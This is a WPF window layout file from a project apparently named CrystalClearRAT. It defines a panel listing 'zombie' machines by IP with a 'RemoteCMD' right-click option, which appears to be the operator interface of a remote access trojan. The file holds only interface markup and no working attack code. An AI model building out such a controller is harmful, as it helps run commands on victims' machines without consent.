CrystalClearRAT/MainWindow.xaml

<Window x:Class="CrystalClearRAT.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:CrystalClearRAT"
        mc:Ignorable="d"
        Title="MainWindow" Height="450" Width="800">

    <Grid Loaded="Grid_Loaded">

        
        
        
        <Button Content="Button" HorizontalAlignment="Left" Margin="631,340,0,0" VerticalAlignment="Top" Width="75" Click="Button_Click"/>
        <ListView x:Name="zombieListView" HorizontalAlignment="Left" Height="140" Margin="129,73,0,0" VerticalAlignment="Top" Width="548">
            <ListView.ItemTemplate>
                <DataTemplate>
                    
                    <WrapPanel>
                        <TextBlock Text="IP: "></TextBlock>
                        <TextBlock Text="{Binding IP}"></TextBlock>
                    </WrapPanel>
                </DataTemplate>
            </ListView.ItemTemplate>
            <ListView.Resources>
                <Style  TargetType="{x:Type ListViewItem}">
                    <EventSetter Event="PreviewMouseRightButtonDown" Handler="OnMouseRightButtonDown" />
                </Style>

                <ContextMenu x:Key="zombieContextMenu">
                    <MenuItem Header="RemoteCMD" Background="WhiteSmoke" Click="RemoteCMDItem_Click" />
                </ContextMenu>

            </ListView.Resources>
        </ListView>

    </Grid>
</Window>
